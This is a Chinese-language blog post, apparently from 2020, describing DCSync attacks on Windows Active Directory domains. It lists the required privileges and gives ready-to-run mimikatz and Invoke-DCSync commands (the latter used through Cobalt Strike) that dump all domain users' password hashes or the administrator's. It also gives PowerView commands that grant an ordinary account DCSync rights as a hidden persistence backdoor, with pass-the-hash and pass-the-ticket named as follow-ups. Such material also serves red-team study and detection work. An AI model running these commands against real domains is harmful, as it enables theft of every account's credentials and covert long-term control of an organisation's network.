域渗透-DCSync

 
DCSync是域渗透中经常用到的技术(我在大致学习了以后发现确实如此)
 
利用条件:
 

获得以下任一用户的权限:

Administrators组内的用户
Domain Admins组内的用户
Enterprise Admins组内的用户
域控制器的计算机帐户

 

Mimikatz实现

 

导出域内所有用户hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:Mikasa.com /all /csv" exit
导出指定用户Hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:Mikasa.com /user:administrator /csv" exit

 

 

Powershell实现

 
https://gist.github.com/monoxgas/9d238accd969550136db

 
我这里面用CS的Powershell-import导入后使用
 
导出所有用户
 
Invoke-DCSync -DumpForest | ft -wrap -autosize

 
导出administrator
 
Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize
 

 
导出后我们就可以pth,ptt了
 

利用DCSync权限维持

 
利用条件
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1#L8270
 

Domain Admins组内的用户
Enterprise Admins组内的用户

 
看了一下,好像是利用DCSync对普通用户添加ACE,用于修改ACL(Access Conotrol list),让普通用户也有获取到域管理员密码hash的权限
 
先使用Beacon自带的,powershell-import导入后使用
 

添加ACE
powershell Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose
删除ACE
powershell Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose

效果
 

 
站在前人的肩膀上!!

posted @ 2020-02-15 22:35  Zahad003  阅读(1639)  评论(0编辑  收藏  举报